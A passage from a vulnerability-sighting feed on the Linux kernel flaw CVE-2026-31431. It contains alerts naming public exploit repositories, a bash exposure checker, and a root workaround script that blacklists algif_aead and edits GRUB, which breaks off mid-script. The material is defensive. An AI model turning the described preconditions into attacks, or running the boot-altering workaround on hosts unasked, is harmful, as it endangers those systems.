\u0441\u0431\u043e\u0440\u043a\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u044f\u0434\u0435\u0440 \u0434\u043b\u044f ROSA 13 \u0438 ROSA 2021.1 (ROSA 12), \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u044f\u0434\u0440\u0430 6.12, 6.6, 5.15 \u0438 5.10. \u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u044f\u0434\u0435\u0440 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b \u0434\u043b\u044f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u044b\u0445 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440 x86_64 (Intel, AMD), aarch64 (Baikal\u2011M, Baikal\u2011L) \u0438 loongarch64 (Loongson, \u00ab\u0418\u0440\u0442\u044b\u0448\u00bb).\n\n#\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c #\u041e\u0421", "creation_timestamp": "2026-05-05T11:37:13.000000Z"}, {"uuid": "32382e0d-265e-4a75-a170-51da488cef3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82904", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Copy-Fail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Industri4l-H3ll-Xpl0it3rs\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 10:59:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 Exploit | by infrar3d\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T11:00:04.000000Z"}, {"uuid": "279b3b04-b993-4724-9a87-ad83d8bc5f2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82888", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Copy-Fail-CVE-2026-31431-Kubernetes-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Percivalll\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 44  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 14\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 09:55:23\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T10:00:05.000000Z"}, {"uuid": "ee6bbb38-21f9-4b95-9eff-64a999052ad7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/khoipro/fbcbfa478c3fd58b001a2dc3d620bcdf", "content": "#!/bin/bash\n# CVE-2026-31431 (\"Copy Fail\") \u2014 pure-bash static vulnerability checker\n#\n# Exit codes:\n#   0 = NOT VULNERABLE (patched kernel or preconditions not met)\n#   1 = INCONCLUSIVE\n#   2 = LIKELY VULNERABLE\n#   3 = MITIGATED (workaround applied, kernel not yet patched)\n#\n# Use only on hosts you own or are explicitly authorized to test.\n\nKERNEL=$(uname -r)\nARCH=$(uname -m)\nALG_NAME=\"authencesn(hmac(sha256),cbc(aes))\"\n\nRED='\\033[0;31m'; GREEN='\\033[0;32m'; YELLOW='\\033[1;33m'\nBOLD='\\033[1m';   DIM='\\033[2m';      NC='\\033[0m'\n\n# \u2500\u2500\u2500 result variables \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nR_KVER=\"\"        # patched | vulnerable | not_affected | unknown\nR_KVER_NOTE=\"\"\nR_CFG=\"\"         # m | y | not_set | unknown\nR_MOD=\"\"         # loaded | on_disk | absent\nR_AF_ALG=\"\"      # available | unavailable\nR_CRYPTO=\"\"      # present | absent\nR_WORKAROUND=\"\"  # blacklist | cmdline | both | none\nR_WA_NOTE=\"\"\nR_CONTAINER=\"\"   # no | docker | container | systemd-nspawn\n\n# \u2500\u2500\u2500 checks (silent) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ncheck_kernel_version() {\n    local rel=\"${KERNEL%%-*}\"\n    local major minor patch\n    IFS='.' read -r major minor patch <<< \"$rel\"\n    patch=\"${patch%%[^0-9]*}\"\n    major=\"${major:-0}\"; minor=\"${minor:-0}\"; patch=\"${patch:-0}\"\n\n    if [ \"$major\" -lt 4 ] || { [ \"$major\" -eq 4 ] && [ \"$minor\" -lt 14 ]; }; then\n        R_KVER=\"not_affected\"; R_KVER_NOTE=\"< 4.14, predates vulnerable code\"; return\n    fi\n\n    # \u2500\u2500 RHEL-family kernels \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n    # Format: major.minor.0-BUILD.elX[_Y].ARCH  (e.g. 5.14.0-214.el9.x86_64)\n    # The upstream sublevel is always .0; the RHEL build number carries the\n    # real patch level.  We cannot compare patch against the upstream LTS\n    # table, so we check the RPM changelog for the actual CVE fix.\n    if echo \"$KERNEL\" | grep -qE \"\\.el[0-9]\"; then\n        local rhel_build el_tag kern_pkg\n        rhel_build=$(echo \"$KERNEL\" | sed 's/.*-\\([0-9]*\\)\\..*/\\1/')\n        el_tag=$(echo \"$KERNEL\" | grep -oE \"el[0-9]+(_[0-9]+)?\" | head -1)\n\n        if command -v rpm >/dev/null 2>&1; then\n            # Find the exact RPM that owns this kernel's vmlinuz\n            kern_pkg=$(rpm -qf \"/boot/vmlinuz-${KERNEL}\" 2>/dev/null | head -1)\n            # Fallback: kernel-core package by NEVRA\n            [ -z \"$kern_pkg\" ] && \\\n                kern_pkg=$(rpm -qa 2>/dev/null | grep -E \"^kernel(-core)?-\" \\\n                           | grep \"${KERNEL%.*}\" | head -1)\n            if [ -n \"$kern_pkg\" ]; then\n                if rpm -q --changelog \"$kern_pkg\" 2>/dev/null \\\n                        | grep -qF \"CVE-2026-31431\"; then\n                    R_KVER=\"patched\"\n                    R_KVER_NOTE=\"RHEL backport confirmed (${el_tag} build ${rhel_build})\"\n                else\n                    R_KVER=\"vulnerable\"\n                    R_KVER_NOTE=\"RHEL ${el_tag} build ${rhel_build} \u2014 CVE-2026-31431 not in kernel changelog\"\n                fi\n            else\n                # Package query failed (container without /boot, or non-RPM overlay)\n                R_KVER=\"unknown\"\n                R_KVER_NOTE=\"RHEL ${el_tag} \u2014 run: rpm -q --changelog kernel-core-\\$(uname -r) | grep CVE-2026-31431\"\n            fi\n        else\n            R_KVER=\"unknown\"\n            R_KVER_NOTE=\"RHEL-family ${el_tag} build ${rhel_build} \u2014 check Red Hat advisory for CVE-2026-31431\"\n        fi\n        return\n    fi\n\n    # \u2500\u2500 Upstream LTS version table \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n    local patched=0 min_patch=\"\"\n    case \"$major.$minor\" in\n        5.10) min_patch=254; [ \"$patch\" -ge 254 ] && patched=1 ;;\n        5.15) min_patch=204; [ \"$patch\" -ge 204 ] && patched=1 ;;\n        6.1)  min_patch=170; [ \"$patch\" -ge 170 ] && patched=1 ;;\n        6.6)  min_patch=137; [ \"$patch\" -ge 137 ] && patched=1 ;;\n        6.12) min_patch=85;  [ \"$patch\" -ge 85  ] && patched=1 ;;\n        6.18) min_patch=22;  [ \"$patch\" -ge 22  ] && patched=1 ;;\n        6.19) min_patch=12;  [ \"$patch\" -ge 12  ] && patched=1 ;;\n    esac\n\n    if [ \"$patched\" -eq 1 ]; then\n        R_KVER=\"patched\"; R_KVER_NOTE=\"patched release\"\n    elif [ -n \"$min_patch\" ]; then\n        R_KVER=\"vulnerable\"; R_KVER_NOTE=\"vulnerable, patched >= $major.$minor.$min_patch\"\n    elif { [ \"$major\" -gt 6 ] || { [ \"$major\" -eq 6 ] && [ \"$minor\" -ge 20 ]; }; }; then\n        # Beyond the highest tracked LTS \u2014 may or may not be patched\n        R_KVER=\"unknown\"; R_KVER_NOTE=\"beyond tracked versions \u2014 check distro advisory\"\n    else\n        # 4.14\u20136.19 non-LTS or EOL: in vulnerable range, no upstream fix for this series\n        R_KVER=\"vulnerable\"\n        R_KVER_NOTE=\"non-LTS/EOL upstream series ${major}.${minor} \u2014 no upstream fix available\"\n    fi\n}\n\ncheck_kernel_config() {\n    local val\n    val=$(grep -E \"^CONFIG_CRYPTO_USER_API_AEAD=\" /boot/config-\"$KERNEL\" 2>/dev/null \\\n        || zcat /proc/config.gz 2>/dev/null | grep -E \"^CONFIG_CRYPTO_USER_API_AEAD=\")\n    case \"$val\" in\n        *=m) R_CFG=\"m\" ;;\n        *=y) R_CFG=\"y\" ;;\n        \"\")\n            # Distinguish: config file readable but key absent = not compiled\n            #              config file unreadable            = unknown state\n            if [ -r \"/boot/config-${KERNEL}\" ] || [ -r /proc/config.gz ]; then\n                R_CFG=\"not_set\"\n            else\n                R_CFG=\"unknown\"\n            fi\n            ;;\n        *)   R_CFG=\"unknown\" ;;\n    esac\n}\n\ncheck_module() {\n    if lsmod 2>/dev/null | grep -q \"^algif_aead\"; then\n        R_MOD=\"loaded\"; return\n    fi\n    local ko\n    ko=$(find /lib/modules/\"$KERNEL\" -name \"algif_aead.ko*\" 2>/dev/null | head -1)\n    [ -n \"$ko\" ] && R_MOD=\"on_disk\" || R_MOD=\"absent\"\n}\n\ncheck_af_alg() {\n    if grep -qE \"^ALG\\b\" /proc/net/protocols 2>/dev/null \\\n        || lsmod 2>/dev/null | grep -q \"^af_alg\"; then\n        R_AF_ALG=\"available\"\n    else\n        R_AF_ALG=\"unavailable\"\n    fi\n}\n\ncheck_proc_crypto() {\n    if [ ! -r /proc/crypto ]; then\n        R_CRYPTO=\"absent\"; return\n    fi\n    grep -qF \"name         : $ALG_NAME\" /proc/crypto 2>/dev/null \\\n        && R_CRYPTO=\"present\" || R_CRYPTO=\"absent\"\n}\n\ncheck_workaround() {\n    local bl=0 cl=0 gb=0\n\n    # 1. modprobe.d blacklist (=m case, effective immediately after rmmod)\n    if grep -rl \"install algif_aead /bin/false\" /etc/modprobe.d/ 2>/dev/null | grep -q .; then\n        bl=1\n    fi\n\n    # 2. initcall_blacklist active in CURRENT boot (=y case, effective now)\n    grep -q \"initcall_blacklist=algif_aead_init\" /proc/cmdline 2>/dev/null && cl=1\n\n    # 3. initcall_blacklist configured in bootloader but NOT yet active (pending reboot)\n    if [ $cl -eq 0 ]; then\n        if command -v grubby >/dev/null 2>&1 \\\n                && grubby --info=ALL 2>/dev/null \\\n                   | grep -qF \"initcall_blacklist=algif_aead_init\"; then\n            gb=1\n        elif grep -q \"initcall_blacklist=algif_aead_init\" /etc/default/grub 2>/dev/null; then\n            gb=1\n        fi\n    fi\n\n    if   [ $bl -eq 1 ] && [ $cl -eq 1 ]; then\n        R_WORKAROUND=\"both\";      R_WA_NOTE=\"blacklist + cmdline\"\n    elif [ $bl -eq 1 ]; then\n        R_WORKAROUND=\"blacklist\"; R_WA_NOTE=\"/etc/modprobe.d/\"\n    elif [ $cl -eq 1 ]; then\n        R_WORKAROUND=\"cmdline\";   R_WA_NOTE=\"initcall_blacklist active in /proc/cmdline\"\n    elif [ $gb -eq 1 ]; then\n        R_WORKAROUND=\"pending\";   R_WA_NOTE=\"configured in bootloader \u2014 reboot required to activate\"\n    else\n        R_WORKAROUND=\"none\";      R_WA_NOTE=\"\"\n    fi\n}\n\ncheck_container() {\n    if [ -f /.dockerenv ]; then\n        R_CONTAINER=\"docker\"\n    elif grep -qE \"lxc|kubepods|docker|containerd\" /proc/1/cgroup 2>/dev/null; then\n        R_CONTAINER=\"container\"\n    elif [ -n \"${container:-}\" ]; then\n        R_CONTAINER=\"systemd-nspawn\"\n    else\n        R_CONTAINER=\"no\"\n    fi\n}\n\n# \u2500\u2500\u2500 run all checks silently \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ncheck_kernel_version\ncheck_kernel_config\ncheck_module\ncheck_af_alg\ncheck_proc_crypto\ncheck_workaround\ncheck_container\n\n# \u2500\u2500\u2500 helper: colored label \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nclabel() {\n    # clabel COLOR \"TEXT\"\n    printf \"${1}%-12s${NC}\" \"$2\"\n}\n\nok()   { clabel \"$GREEN\"  \"$1\"; }\nbad()  { clabel \"$RED\"    \"$1\"; }\nmeh()  { clabel \"$YELLOW\" \"$1\"; }\ndim()  { printf \"${DIM}%s${NC}\" \"$1\"; }\n\n# \u2500\u2500\u2500 status table \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nW=54\nDIV=$(printf '\u2500%.0s' $(seq 1 $W))\n\necho -e \"${BOLD}CVE-2026-31431 \\\"Copy Fail\\\"${NC}  \u00b7  $KERNEL  \u00b7  $ARCH\"\necho \"$DIV\"\nprintf \"  %-18s %-14s %s\\n\" \"CHECK\" \"VALUE\" \"NOTE\"\necho \"$DIV\"\n\n# 1. Kernel version\nprintf \"  %-18s \" \"Kernel\"\ncase \"$R_KVER\" in\n    patched)      ok  \"patched\"     ;;\n    not_affected) ok  \"not affected\" ;;\n    vulnerable)   bad \"vulnerable\"  ;;\n    *)            meh \"unknown\"     ;;\nesac\nprintf \"  %s\\n\" \"$(dim \"$R_KVER_NOTE\")\"\n\n# 2. Kernel config\nprintf \"  %-18s \" \"Config\"\ncase \"$R_CFG\" in\n    not_set) ok  \"not set\"  ;;\n    m)       meh \"=m\"       ;;\n    y)       bad \"=y\"       ;;\n    *)       meh \"unknown\"  ;;\nesac\ncase \"$R_CFG\" in\n    m)       printf \"  %s\\n\" \"$(dim \"loadable module\")\" ;;\n    y)       printf \"  %s\\n\" \"$(dim \"built-in, rmmod N/A\")\" ;;\n    not_set) printf \"  %s\\n\" \"$(dim \"not compiled\")\" ;;\n    unknown) printf \"  %s\\n\" \"$(dim \"config file unreadable\")\" ;;\n    *)       printf \"\\n\" ;;\nesac\n\n# 3. Module\nprintf \"  %-18s \" \"algif_aead\"\ncase \"$R_MOD\" in\n    loaded)   bad \"loaded\"    ;;\n    on_disk)  meh \"not loaded\" ;;\n    absent)   ok  \"absent\"    ;;\nesac\ncase \"$R_MOD\" in\n    on_disk) printf \"  %s\\n\" \"$(dim \"module file on disk\")\" ;;\n    *)       printf \"\\n\" ;;\nesac\n\n# 4. AF_ALG\nprintf \"  %-18s \" \"AF_ALG socket\"\ncase \"$R_AF_ALG\" in\n    available)   meh \"available\"   ;;\n    unavailable) ok  \"unavailable\" ;;\nesac\nprintf \"\\n\"\n\n# 5. authencesn\nprintf \"  %-18s \" \"authencesn\"\ncase \"$R_CRYPTO\" in\n    present) bad \"instantiated\" ;;\n    absent)  ok  \"absent\"       ;;\nesac\nprintf \"  %s\\n\" \"$(dim \"/proc/crypto\")\"\n\n# 6. Workaround\nprintf \"  %-18s \" \"Workaround\"\ncase \"$R_WORKAROUND\" in\n    both|blacklist|cmdline) ok  \"${R_WORKAROUND}\" ;;\n    pending)                meh \"pending\"          ;;\n    none)                   bad \"none\"             ;;\nesac\n[ -n \"$R_WA_NOTE\" ] && printf \"  %s\\n\" \"$(dim \"$R_WA_NOTE\")\" || printf \"\\n\"\n\n# 7. Container (only shown when detected \u2014 skipping host means checks may mislead)\nif [ \"$R_CONTAINER\" != \"no\" ]; then\n    printf \"  %-18s \" \"Environment\"\n    meh \"$R_CONTAINER\"\n    printf \"  %s\\n\" \"$(dim \"running inside container \u2014 apply workaround on HOST\")\"\nfi\n\necho \"$DIV\"\n\n# \u2500\u2500\u2500 verdict \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nverdict() {\n    if [ \"$R_KVER\" = \"not_affected\" ]; then\n        printf \"  ${GREEN}${BOLD}NOT VULNERABLE${NC}   kernel predates vulnerable code (< 4.14)\\n\"\n        return 0\n    fi\n    if [ \"$R_KVER\" = \"patched\" ]; then\n        printf \"  ${GREEN}${BOLD}NOT VULNERABLE${NC}   running a patched kernel\\n\"\n        return 0\n    fi\n    if [ \"$R_CFG\" = \"not_set\" ] && [ \"$R_MOD\" = \"absent\" ]; then\n        printf \"  ${GREEN}${BOLD}NOT VULNERABLE${NC}   algif_aead not compiled into this kernel\\n\"\n        return 0\n    fi\n    if [ \"$R_WORKAROUND\" = \"pending\" ] && [ \"$R_MOD\" != \"loaded\" ]; then\n        printf \"  ${YELLOW}${BOLD}MITIGATED${NC}        workaround configured \u2014 ${RED}REBOOT REQUIRED${NC} to activate\\n\"\n        return 3\n    fi\n    if [ \"$R_WORKAROUND\" != \"none\" ] && [ \"$R_WORKAROUND\" != \"pending\" ] && [ \"$R_MOD\" != \"loaded\" ]; then\n        printf \"  ${YELLOW}${BOLD}MITIGATED${NC}        workaround active \u2014 upgrade kernel to apply permanent fix\\n\"\n        return 3\n    fi\n    if [ \"$R_AF_ALG\" = \"available\" ] && [ \"$R_CRYPTO\" = \"present\" ] && [ \"$R_MOD\" = \"loaded\" ]; then\n        printf \"  ${RED}${BOLD}LIKELY VULNERABLE${NC}  all preconditions met \u2014 apply workaround or upgrade kernel\\n\"\n        return 2\n    fi\n    # Module on disk (=m) or built-in (=y) with no workaround:\n    # any unprivileged user can trigger auto-load via AF_ALG socket \u2014 treat as exploitable\n    if [ \"$R_WORKAROUND\" = \"none\" ] && { [ \"$R_MOD\" = \"on_disk\" ] || [ \"$R_CFG\" = \"y\" ]; }; then\n        printf \"  ${RED}${BOLD}LIKELY VULNERABLE${NC}  module loadable/built-in, no workaround \u2014 apply workaround or upgrade kernel\\n\"\n        return 2\n    fi\n    printf \"  ${YELLOW}${BOLD}INCONCLUSIVE${NC}     not all preconditions confirmed \u2014 dynamic test recommended\\n\"\n    return 1\n}\n\nverdict\nEXIT_CODE=$?\necho \"$DIV\"\nexit $EXIT_CODE\n\n\n#!/bin/bash\n# Workaround for CVE-2026-31431 (\"Copy Fail\")\n# Disables algif_aead to prevent page-cache corruption via AF_ALG splice.\n# Supports: Debian/Ubuntu, RHEL/CentOS/Fedora, Arch, SUSE, and derivatives.\nset -e\n\n# ---------------------------------------------------------------------------\n# Pre-flight: must run as root\n# ---------------------------------------------------------------------------\nif [ \"$EUID\" -ne 0 ]; then\n    if command -v sudo >/dev/null 2>&1; then\n        exec sudo \"$0\" \"$@\"\n    else\n        echo \"[-] This script must be run as root.\" >&2\n        exit 1\n    fi\nfi\n\n# ---------------------------------------------------------------------------\n# Container detection \u2014 modprobe blacklist written here affects only THIS\n# container's namespace; it does NOT protect the host kernel.  The built-in\n# (=y) GRUB path is also ineffective because /etc/default/grub inside the\n# container is not the host's bootloader config.\n# ---------------------------------------------------------------------------\nIS_CONTAINER=0\nif [ -f /.dockerenv ] \\\n    || grep -qE \"lxc|kubepods|docker|containerd\" /proc/1/cgroup 2>/dev/null \\\n    || [ -n \"${container:-}\" ]; then\n    IS_CONTAINER=1\n    echo \"[!] Container environment detected.\"\n    echo \"    Workaround applied here affects only this container's namespace.\"\n    echo \"    Apply this script on the HOST system to protect the host kernel.\"\n    echo \"\"\nfi\n\n# ---------------------------------------------------------------------------\n# Detect distro (for logging only \u2014 tool detection drives behaviour)\n# ---------------------------------------------------------------------------\nDISTRO=\"unknown\"\nif [ -f /etc/os-release ]; then\n    DISTRO=$(. /etc/os-release && echo \"${NAME:-unknown}\")\nfi\n\n# ---------------------------------------------------------------------------\n# Detect initramfs rebuild tool\n# ---------------------------------------------------------------------------\nif command -v dracut >/dev/null 2>&1; then\n    INITRAMFS_CMD=\"dracut -f\"\nelif command -v update-initramfs >/dev/null 2>&1; then\n    INITRAMFS_CMD=\"update-initramfs -u\"\nelif command -v mkinitcpio >/dev/null 2>&1; then\n    INITRAMFS_CMD=\"mkinitcpio -P\"\nelif command -v mkinitfs >/dev/null 2>&1; then\n    INITRAMFS_CMD=\"mkinitfs\"           # Alpine Linux\nelse\n    INITRAMFS_CMD=\"\"\nfi\n\n# ---------------------------------------------------------------------------\n# Detect GRUB config tool and target config path\n# ---------------------------------------------------------------------------\nif command -v grub2-mkconfig >/dev/null 2>&1; then\n    GRUB_MKCFG=\"grub2-mkconfig\"\nelif command -v grub-mkconfig >/dev/null 2>&1; then\n    GRUB_MKCFG=\"grub-mkconfig\"\nelse\n    GRUB_MKCFG=\"\"\nfi\n\n# grubby is the preferred kernel-cmdline tool on RHEL/CentOS/Fedora;\n# it handles both legacy GRUB and BLS (Boot Loader Specification) entries.\nif command -v grubby >/dev/null 2>&1; then\n    GRUB_KERNEL_TOOL=\"grubby\"\nelse\n    GRUB_KERNEL_TOOL=\"grub\"\nfi\n\ndetect_grub_cfg_path() {\n    if [ -d /sys/firmware/efi ]; then\n        # Try distro-specific EFI path first to avoid picking the wrong entry\n        # when multiple distros share the same EFI partition.\n        local distro_id cfg\n        distro_id=$(. /etc/os-release 2>/dev/null && echo \"${ID:-}\" || echo \"\")\n        if [ -n \"$distro_id\" ] && [ -f \"/boot/efi/EFI/${distro_id}/grub.cfg\" ]; then\n            echo \"/boot/efi/EFI/${distro_id}/grub.cfg\"\n            return\n        fi\n        # Exclude the generic BOOT fallback directory to avoid stale entries.\n        cfg=$(find /boot/efi/EFI -maxdepth 2 -name \"grub.cfg\" 2>/dev/null \\\n            | grep -iv \"/BOOT/\" | head -1)\n        [ -z \"$cfg\" ] && cfg=$(find /boot/efi -name \"grub.cfg\" 2>/dev/null | head -1)\n        if [ -z \"$cfg\" ]; then\n            echo \"[-] UEFI boot detected but no grub.cfg found under /boot/efi\" >&2\n            exit 1\n        fi\n        echo \"$cfg\"\n    elif [ -f /boot/grub2/grub.cfg ]; then\n        echo \"/boot/grub2/grub.cfg\"\n    elif [ -f /boot/grub/grub.cfg ]; then\n        echo \"/boot/grub/grub.cfg\"\n    else\n        echo \"[-] Cannot locate grub.cfg \u2014 searched /boot/grub2 and /boot/grub\" >&2\n        exit 1\n    fi\n}\n\n# ---------------------------------------------------------------------------\n# Read kernel config\n# ---------------------------------------------------------------------------\nKERNEL=$(uname -r)\nCONFIG_VAL=$(grep -E \"^CONFIG_CRYPTO_USER_API_AEAD=\" /boot/config-\"$KERNEL\" 2>/dev/null \\\n    || zcat /proc/config.gz 2>/dev/null | grep -E \"^CONFIG_CRYPTO_USER_API_AEAD=\" \\\n    || echo \"NOT_FOUND\")\n\necho \"[*] Distro : $DISTRO\"\necho \"[*] Kernel : $KERNEL\"\necho \"[*] CONFIG_CRYPTO_USER_API_AEAD: $CONFIG_VAL\"\necho \"[*] initramfs tool: ${INITRAMFS_CMD:-NOT FOUND}\"\necho \"[*] GRUB mkconfig : ${GRUB_MKCFG:-NOT FOUND}\"\necho \"[*] kernel cmdline: ${GRUB_KERNEL_TOOL}\"\necho \"\"\n\n# ---------------------------------------------------------------------------\ncase \"$CONFIG_VAL\" in\n\n    CONFIG_CRYPTO_USER_API_AEAD=m)\n        echo \"[*] Module mode \u2014 rmmod + blacklist + initramfs rebuild\"\n\n        # Unload with modprobe -r to handle dependencies gracefully.\n        # Do NOT exit if unload fails (e.g. module in use, container) \u2014\n        # the blacklist still prevents reload after next reboot.\n        if lsmod | grep -q \"^algif_aead\"; then\n            if modprobe -r algif_aead 2>/dev/null; then\n                echo \"[+] algif_aead unloaded\"\n            else\n                echo \"[!] Could not unload algif_aead (module in use or insufficient privileges)\"\n                echo \"    Blacklist will prevent reload. Reboot to fully apply.\"\n            fi\n        else\n            echo \"[*] algif_aead not currently loaded, skipping unload\"\n        fi\n\n        BLACKLIST_FILE=\"/etc/modprobe.d/disable-algif_aead.conf\"\n        if [ -f \"$BLACKLIST_FILE\" ]; then\n            echo \"[*] Blacklist already present at $BLACKLIST_FILE\"\n        else\n            echo \"install algif_aead /bin/false\" | tee \"$BLACKLIST_FILE\" > /dev/null\n            echo \"[+] Blacklisted at $BLACKLIST_FILE\"\n\n            if [ -z \"$INITRAMFS_CMD\" ]; then\n                echo \"[-] No initramfs rebuild tool found (dracut / update-initramfs / mkinitcpio).\" >&2\n                echo \"    Rebuild initramfs manually before next boot.\" >&2\n            else\n                $INITRAMFS_CMD\n                echo \"[+] initramfs rebuilt ($INITRAMFS_CMD)\"\n            fi\n        fi\n        ;;\n\n    CONFIG_CRYPTO_USER_API_AEAD=y)\n        echo \"[!] Built-in mode \u2014 must use initcall_blacklist via GRUB kernel cmdline\"\n\n        PARAM=\"initcall_blacklist=algif_aead_init\"\n\n        if [ \"$GRUB_KERNEL_TOOL\" = \"grubby\" ]; then\n            # RHEL / CentOS / Fedora: grubby handles both legacy GRUB and BLS entries.\n            if grubby --info=ALL 2>/dev/null | grep -qF \"$PARAM\"; then\n                echo \"[*] $PARAM already present in kernel args (grubby), skipping\"\n            else\n                grubby --update-kernel=ALL --args=\"$PARAM\"\n                echo \"[+] Added $PARAM to all kernel entries via grubby\"\n                echo \"[+] Reboot to apply. Verify: cat /proc/cmdline | grep initcall_blacklist\"\n            fi\n        else\n            # Debian / Ubuntu / Arch / SUSE: edit /etc/default/grub then mkconfig\n            GRUB_FILE=\"/etc/default/grub\"\n\n            if ! [ -f \"$GRUB_FILE\" ]; then\n                echo \"[-] $GRUB_FILE not found \u2014 cannot configure GRUB automatically.\" >&2\n                echo \"    Add '$PARAM' to your bootloader's kernel command line manually.\" >&2\n                exit 1\n            fi\n\n            if grep -q \"$PARAM\" \"$GRUB_FILE\"; then\n                echo \"[*] $PARAM already present in $GRUB_FILE, skipping\"\n            else\n                # Prefer GRUB_CMDLINE_LINUX (all entries) over _DEFAULT (default entry only)\n                if grep -q \"^GRUB_CMDLINE_LINUX=\" \"$GRUB_FILE\"; then\n                    